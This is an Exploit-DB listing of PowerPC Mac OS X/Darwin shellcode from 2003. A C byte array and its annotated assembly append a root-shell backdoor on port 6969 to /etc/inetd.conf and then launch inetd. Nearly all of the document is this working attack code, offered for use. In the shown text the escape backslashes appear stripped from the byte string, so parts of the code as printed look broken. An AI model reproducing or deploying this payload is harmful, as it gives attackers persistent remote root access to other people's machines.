https://www.exploit-db.com/exploits/13482

漏洞细节尚未披露

/*
PPC OS X / Darwin Shellcode by B-r00t. 2003.
open(); write(); close(); execve(); exit();
See ASM below.
222 Bytes!
*/

char shellcode[] =
"x7cxa5x2ax79x40x82xffxfdx7dx48x02xa6x3bxeax01x70"
"x39x60x01x70x39x1fxffx1bx7cxa8x29xaex39x1fxffx65"
"x7cxa8x29xaex38x7fxffx0cx38x8bxfex99x38xa0xffxff"
"x38x0bxfex95x44xffxffx02x60x60x60x60x38x9fxffx1c"
"x38xabxfexcax38x0bxfex94x44xffxffx02x60x60x60x60"
"x38x0bxfex96x44xffxffx02x60x60x60x60x7cxa5x2ax79"
"x38x7fxffx56x90x61xffxf8x90xa1xffxfcx38x81xffxf8"
"x38x0bxfexcbx44xffxffx02x60x60x60x60x38x0bxfex91"
"x44xffxffx02x2fx65x74x63x2fx69x6ex65x74x64x2ex63"
"x6fx6ex66x58x0ax61x63x6dx73x6fx64x61x20x73x74x72"
"x65x61x6dx20x74x63x70x20x6ex6fx77x61x69x74x20x72"
"x6fx6fx74x20x2fx75x73x72x2fx6cx69x62x65x78x65x63"
"x2fx74x63x70x64x20x2fx62x69x6ex2fx73x68x0ax2fx75"
"x73x72x2fx73x62x69x6ex2fx69x6ex65x74x64x58";

int main (void) 
{
        __asm__("b _shellcode");
}

/*
; PPC OS X / Darwin Shellcode by B-r00t. 
; open(); write(); close(); execve(); exit()
; Appends a backdoor (port 6969 rootshell) line into 
; '/etc/inetd.conf' and executes '/usr/sbin/inetd'.
; Commands MUST end with ';' ie. uname -a;
;
.globl _main
.text
_main:
        xor.    r5, r5, r5
        bnel    _main                    
        mflr    r10
	addi	r31, r10, 368
	li      r11, 368
        addi    r8, r31, -229 
        stbx    r5, r8, r5
        addi    r8, r31, -155 
        stbx    r5, r8, r5
        addi    r3, r31, -244
	addi    r4, r11, -359
        li      r5, -1  
        addi    r0, r11, -363 
        .long   0x44ffff02
        .long   0x60606060
        addi    r4, r31, -228 
        addi    r5, r11, -310
        addi    r0, r11, -364
        .long   0x44ffff02
        .long   0x60606060
        addi    r0, r11, -362
        .long   0x44ffff02      
        .long   0x60606060
        xor.    r5, r5, r5
        addi    r3, r31, -170          
        stw     r3, -8(r1)      
        stw     r5, -4(r1)      
        subi    r4, r1, 8       
        addi     r0, r11, -309             
        .long   0x44ffff02      
        .long   0x60606060
        addi    r0, r11, -367
        .long   0x44ffff02
path:   .asciz  "/etc/inetd.confXnacmsoda stream tcp nowait root /usr/libexec/tcpd /bin/shn/usr/sbin/inetdX"

*/

// milw0rm.com [2004-09-26]